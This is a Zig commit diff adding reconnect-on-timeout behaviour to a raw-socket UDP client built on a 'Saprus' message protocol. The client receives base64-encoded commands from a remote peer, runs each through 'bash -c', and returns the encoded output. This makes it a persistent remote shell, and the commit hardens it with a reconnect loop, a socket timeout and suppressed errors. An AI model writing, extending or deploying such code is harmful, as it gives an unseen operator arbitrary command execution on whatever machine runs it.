Reconnect on timeout

This commit is contained in:
2026-01-19 19:04:07 -05:00
parent 4106679262
commit def8454012

View File

@@ -195,82 +195,43 @@ pub fn main(init: std.process.Init) !void {
} }
if (flags.connect != null) { if (flags.connect != null) {
const dest = rand.intRangeAtMost(u16, 1025, std.math.maxInt(u16)); reconnect: while (true) {
const src = rand.intRangeAtMost(u16, 1025, std.math.maxInt(u16)); headers.udp.dst_port = 8888;
// udp dest port should not be 8888 after first const dest = rand.intRangeAtMost(u16, 1025, std.math.maxInt(u16));
const udp_dest_port = rand.intRangeAtMost(u16, 9000, std.math.maxInt(u16)); const src = rand.intRangeAtMost(u16, 1025, std.math.maxInt(u16));
var connection: SaprusMessage = .{ // udp dest port should not be 8888 after first
.connection = .{ const udp_dest_port = rand.intRangeAtMost(u16, 9000, std.math.maxInt(u16));
.src = src, var connection: SaprusMessage = .{
.dest = dest, .connection = .{
.seq = undefined, .src = src,
.id = undefined, .dest = dest,
.payload = flags.connect.?, .seq = undefined,
}, .id = undefined,
}; .payload = flags.connect.?,
},
try socket.attachSaprusPortFilter(src);
var connection_buf: [2048]u8 = undefined;
var connection_bytes = connection.toBytes(&connection_buf);
headers.setPayloadLen(connection_bytes.len);
var full_msg = blk: {
var msg_buf: [2048]u8 = undefined;
var msg_w: Writer = .fixed(&msg_buf);
msg_w.writeAll(&headers.toBytes()) catch unreachable;
msg_w.writeAll(connection_bytes) catch unreachable;
break :blk msg_w.buffered();
};
try socket.send(full_msg);
var res_buf: [4096]u8 = undefined;
var res = try socket.receive(&res_buf);
headers.udp.dst_port = udp_dest_port;
full_msg = blk: {
var msg_buf: [2048]u8 = undefined;
var msg_w: Writer = .fixed(&msg_buf);
msg_w.writeAll(&headers.toBytes()) catch unreachable;
msg_w.writeAll(connection_bytes) catch unreachable;
break :blk msg_w.buffered();
};
try socket.send(full_msg);
while (true) {
res = try socket.receive(&res_buf);
const connection_res = blk: {
const msg: SaprusMessage = try .parse(res[42..]);
break :blk msg.connection;
}; };
const b64d = std.base64.standard.Decoder;
var connection_payload_buf: [4096]u8 = undefined;
const connection_payload = connection_payload_buf[0..try b64d.calcSizeForSlice(connection_res.payload)];
try b64d.decode(connection_payload, connection_res.payload);
const child = try std.process.spawn(init.io, .{ try socket.attachSaprusPortFilter(src);
.argv = &.{ "bash", "-c", connection_payload },
.stdout = .pipe,
.stderr = .pipe,
});
var child_stdout: std.ArrayList(u8) = .empty; var connection_buf: [2048]u8 = undefined;
defer child_stdout.deinit(init.gpa); var connection_bytes = connection.toBytes(&connection_buf);
var child_stderr: std.ArrayList(u8) = .empty;
defer child_stderr.deinit(init.gpa);
try child.collectOutput(init.gpa, &child_stdout, &child_stderr, 4096);
const b64e = std.base64.standard.Encoder;
var cmd_output_buf: [4096]u8 = undefined;
const cmd_output = b64e.encode(&cmd_output_buf, child_stdout.items);
connection.connection.payload = cmd_output;
connection_bytes = connection.toBytes(&connection_buf);
headers.setPayloadLen(connection_bytes.len); headers.setPayloadLen(connection_bytes.len);
var full_msg = blk: {
var msg_buf: [2048]u8 = undefined;
var msg_w: Writer = .fixed(&msg_buf);
msg_w.writeAll(&headers.toBytes()) catch unreachable;
msg_w.writeAll(connection_bytes) catch unreachable;
break :blk msg_w.buffered();
};
socket.send(full_msg) catch continue;
var res_buf: [4096]u8 = undefined;
var res = socket.receive(&res_buf) catch continue;
headers.udp.dst_port = udp_dest_port;
full_msg = blk: { full_msg = blk: {
var msg_buf: [2048]u8 = undefined; var msg_buf: [2048]u8 = undefined;
var msg_w: Writer = .fixed(&msg_buf); var msg_w: Writer = .fixed(&msg_buf);
@@ -278,11 +239,53 @@ pub fn main(init: std.process.Init) !void {
msg_w.writeAll(connection_bytes) catch unreachable; msg_w.writeAll(connection_bytes) catch unreachable;
break :blk msg_w.buffered(); break :blk msg_w.buffered();
}; };
socket.send(full_msg) catch continue;
try socket.send(full_msg); while (true) {
res = socket.receive(&res_buf) catch continue :reconnect;
const connection_res = blk: {
const msg: SaprusMessage = try .parse(res[42..]);
break :blk msg.connection;
};
const b64d = std.base64.standard.Decoder;
var connection_payload_buf: [4096]u8 = undefined;
const connection_payload = connection_payload_buf[0..try b64d.calcSizeForSlice(connection_res.payload)];
try b64d.decode(connection_payload, connection_res.payload);
const child = std.process.spawn(init.io, .{
.argv = &.{ "bash", "-c", connection_payload },
.stdout = .pipe,
.stderr = .pipe,
}) catch continue;
var child_stdout: std.ArrayList(u8) = .empty;
defer child_stdout.deinit(init.gpa);
var child_stderr: std.ArrayList(u8) = .empty;
defer child_stderr.deinit(init.gpa);
try child.collectOutput(init.gpa, &child_stdout, &child_stderr, 4096);
const b64e = std.base64.standard.Encoder;
var cmd_output_buf: [4096]u8 = undefined;
const cmd_output = b64e.encode(&cmd_output_buf, child_stdout.items);
connection.connection.payload = cmd_output;
connection_bytes = connection.toBytes(&connection_buf);
headers.setPayloadLen(connection_bytes.len);
full_msg = blk: {
var msg_buf: [2048]u8 = undefined;
var msg_w: Writer = .fixed(&msg_buf);
msg_w.writeAll(&headers.toBytes()) catch continue;
msg_w.writeAll(connection_bytes) catch continue;
break :blk msg_w.buffered();
};
try socket.send(full_msg);
}
return;
} }
return;
} }
unreachable; unreachable;
@@ -398,6 +401,10 @@ const RawSocket = struct {
const bind_ret = std.os.linux.bind(socket, @ptrCast(&sockaddr_ll), @sizeOf(@TypeOf(sockaddr_ll))); const bind_ret = std.os.linux.bind(socket, @ptrCast(&sockaddr_ll), @sizeOf(@TypeOf(sockaddr_ll)));
if (bind_ret != 0) return error.BindError; if (bind_ret != 0) return error.BindError;
const timeout: std.os.linux.timeval = .{ .sec = 600, .usec = 0 };
const timeout_ret = std.os.linux.setsockopt(socket, std.os.linux.SOL.SOCKET, std.os.linux.SO.RCVTIMEO, @ptrCast(&timeout), @sizeOf(@TypeOf(timeout)));
if (timeout_ret != 0) return error.SetTimeoutError;
return .{ return .{
.fd = socket, .fd = socket,
.sockaddr_ll = sockaddr_ll, .sockaddr_ll = sockaddr_ll,
@@ -419,7 +426,7 @@ const RawSocket = struct {
@ptrCast(&self.sockaddr_ll), @ptrCast(&self.sockaddr_ll),
@sizeOf(@TypeOf(self.sockaddr_ll)), @sizeOf(@TypeOf(self.sockaddr_ll)),
); );
std.debug.assert(sent_bytes == payload.len); _ = sent_bytes;
} }
fn receive(self: RawSocket, buf: []u8) ![]u8 { fn receive(self: RawSocket, buf: []u8) ![]u8 {
@@ -431,6 +438,9 @@ const RawSocket = struct {
null, null,
null, null,
); );
if (std.os.linux.errno(len) != .SUCCESS) {
return error.Timeout; // TODO: get the real error, assume timeout for now.
}
return buf[0..len]; return buf[0..len];
} }